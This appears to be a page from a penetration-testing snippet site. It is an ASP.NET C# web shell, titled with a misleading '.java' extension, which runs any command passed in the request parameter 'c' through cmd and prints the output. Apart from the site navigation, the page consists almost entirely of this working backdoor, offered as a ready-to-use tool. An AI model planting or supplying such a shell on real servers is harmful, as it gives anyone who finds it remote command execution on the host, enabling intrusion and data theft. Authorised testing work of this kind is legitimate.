MrLeet
Machines
Notes
Pics
Walkthroughs
Submit
Machine
Note
Pics
Walkthrough
About
About_us
Contact_us
FAQ
Search
Account
Login
Register
Back
Score
0
Title:
minimum_csharp_shell.java- exploitation tool used and required in Penetration Testing
Author:
ajayverma
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%=
Process.Start(
new ProcessStartInfo("cmd" ,"/c " + Request["c"] )
{
UseShellExecute = false,
RedirectStandardOutput = true
}
).StandardOutput.ReadToEnd()
%>
Like
|
Dislike
Submitted On:
2019-06-26 09:48:00
© MrLeet 2017-2019